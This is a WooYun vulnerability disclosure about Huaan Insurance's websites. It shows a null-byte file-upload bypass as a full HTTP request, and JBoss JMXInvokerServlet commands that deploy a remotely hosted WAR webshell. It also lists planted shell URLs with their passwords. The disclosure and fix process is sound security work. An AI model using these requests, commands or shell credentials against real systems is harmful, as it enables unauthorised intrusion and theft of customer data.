当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117211

漏洞标题:华安保险主站上传绕过验证上传shell及另几个分站的问题打包

相关厂商:华安保险

漏洞作者: 茜茜公主

提交时间:2015-05-31 08:50

修复时间:2015-07-19 15:32

公开时间:2015-07-19 15:32

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-31: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-14: 细节向核心白帽子及相关领域专家公开
2015-06-24: 细节向普通白帽子公开
2015-07-04: 细节向实习白帽子公开
2015-07-19: 细节向公众公开

简要描述:

主站任意文件上传及另几个站修复不当导致命令执行的问题

详细说明:

1#主站http://www.sinosafe.com.cn
WooYun: 华安保险官网某处可任意上传html文件到根目录
针对该漏洞提出只能上传html等系统限制的后缀进行了绕过
http://www.sinosafe.com.cn/upload/uppics.htm上传后抓包

QQ截图20150530210820.jpg


POST http://www.sinosafe.com.cn/upload/pics.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.sinosafe.com.cn/upload/uppics.htm
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df373d2a089c
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 412
Host: www.sinosafe.com.cn
Pragma: no-cache
-----------------------------7df373d2a089c
Content-Disposition: form-data; name="cunfanweizhi"
/car
-----------------------------7df373d2a089c
Content-Disposition: form-data; name="FileName"; filename="wooyun.jsp%00;.jpg"
Content-Type: image/pjpeg
test
-----------------------------7df373d2a089c
Content-Disposition: form-data; name="Submit"
 ϴ 
-----------------------------7df373d2a089c--


记得将上面filename="wooyun.jsp%00;.jpg"的%00进行URL-decode

QQ截图20150530211433.jpg


QQ截图20150530211554.jpg


上传后的
一句话地址:http://www.sinosafe.com.cn/car/wooyun.jsp
密码:woo0yun

QQ截图20150530211731.jpg


服务器已成马场
追溯到08年上传的马儿(目测当时eweb编辑器弱口令)
http://www.sinosafe.com.cn/editor/uploadfile/1.jsp

漏洞证明:

QQ截图20150530212057.jpg


另外该服务器上还部署了

华安保险承保理赔信息系统https://www.sinosafe.com.cn:9080/haclaim/
华安保险电子保单系统https://www.sinosafe.com.cn:18080/elec/
信用卡客户保险激活系统http://www.sinosafe.com.cn:16080/internet/zhzx/activation.jsp
华安保险2015校园招聘
http://www.sinosafe.com.cn:8899/jobsys/2015xiaoyuanzhaopin/default.htm


针对这几个系统曾经有白帽子在2012年提出jboss弱口令利用jmx-console拿shell的方法 WooYun: 华安保险JBoss弱口令及远程代码执行
之后又有白帽子提出过head绕过认证拿shell的方法 WooYun: 华安保险JBoss JMX-console HTTP认证绕过,远程写shell漏洞
但仍然未能彻底修复head绕过的问题,仍可通过jmx-console绕过验证拿shell

QQ截图20150530220110.jpg


一句话:https://www.sinosafe.com.cn:9080/wooyun/wooyun.jsp
密码woo0yun

QQ截图20150530220239.jpg


小马:https://www.sinosafe.com.cn:18080/wooyun/ixm.jsp
http://www.sinosafe.com.cn:16080/internet/zhzx/activation.jsp该站删除了jmx-console,但是,jboss还有一种getshell方式

java -jar jboss_exploit_fat.jar -i http://www.sinosafe.com.cn:16080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://p2j.cn/is.war


QQ截图20150530220624.jpg


shell地址:http://www.sinosafe.com.cn:16080/is/index.jsp
密码:023

QQ截图20150530221035.jpg


java -jar jboss_exploit_fat.jar -i http://www.sinosafe.com.cn:8899/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://p2j.cn/is.war


shell地址:http://www.sinosafe.com.cn:8899/is/index.jsp
密码:023

QQ截图20150530221126.jpg


现已凑齐jboss拿shell2种方法,集齐七种可在wooyun兑换神秘礼物。

修复方案:

主站上传点进行权限控制;
jboss不知道如果配置,最简单的方法就是删jmx-console、删invoker/JMXInvokerServlet

版权声明:转载请注明来源 茜茜公主@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-06-04 15:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无